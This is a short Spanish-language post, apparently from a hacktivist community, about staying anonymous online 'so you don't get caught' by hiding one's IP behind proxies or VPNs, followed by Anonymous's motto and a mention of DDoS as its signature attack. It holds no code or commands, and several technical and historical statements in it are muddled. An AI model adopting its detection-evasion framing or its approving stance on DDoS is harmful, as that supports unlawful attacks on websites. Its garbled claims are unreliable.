El Punto mas importante, como mantener mi anonimato?.... Eso es de vital importancia en la comunidad que no te pillen. Aunque debo decir que el anonimato nunca sera al 100% siempre habra la mas pequeña posibilidad de que te descubran, solo te podras camuflajear, pero repito nunca sera al 100%.

Pero como me detectan?

Al conectarte a internet lo haces con una Direccion IP (Internet Protocol), que en pocas palabras en tu identificacion en la red, todo lo que este conectado al Word Web Wide tiene al menos una IP, estas se clasifican en estaticas y dinamicas. 

Mi Ubicacion se encuentra en la IP?

Una IP, es basicamente una red que se basa en el envio de datagramas, Cada datagrama contiene la informacion a enviar y la ubicacion tanto del emisor como la del receptor.

Como oculto mi IP?

Se oculta mediante Proxys o VPN. Un VPN (Virtual Private Network) o Red Privida Virtual en español, es un programa que permite la expasion de tu red local a una red publica NO controlada. "Wikipedia" http://es.wikipedia.org/wiki/Red_privada_virtual.



Existen muchos VPN, hay de tipos gratuitos y pagos, aunque no se recomienda usar gratuitos ya que podrian otorgar tus datos en caso de una situacion legal delicada. Aqui les dejamos algunas VPN gratuitas:

Algunos VPN Pagos

Como dijimos anteriormente, no existe un anonimato completo (por los momentos), solo te camuflajeas y permaneces en las sombras del internet.



Anonymous


¿Qué es Anonymous?

Es un movimiento surgido en los años 2003-2004 con el diminutivo "Anon", que se refiere a Anonimo, termino utilizado en muchas paginas web (Anon) como nick.

Somos Anonimos.
Somos Legion.
No olvidamos
No perdonamos
Esperadnos

 El lema de la legion, dejado como mensaje a lo hora de nuestras advertencias, desde el año 2008 (Tomando como referencia el caso de Wikileaks) anonymous a luchado contra la libertad de expresion  utilizando metodos de ataques sencillos, el mas conocido, el DDoS con el que satura websites. 

No hay lideres, No hay Jerarquias.
Somos una voz, que no se puede silenciar

No tenemos ideologias politicas, estamos en cada rincon, La mascara (de Guy fawkes) es nuestro simbolo, todos como uno....

No hay fronteras, No hay idomas, el conocimeinto es libre, el conocimiento es poder, el poder es nuestro....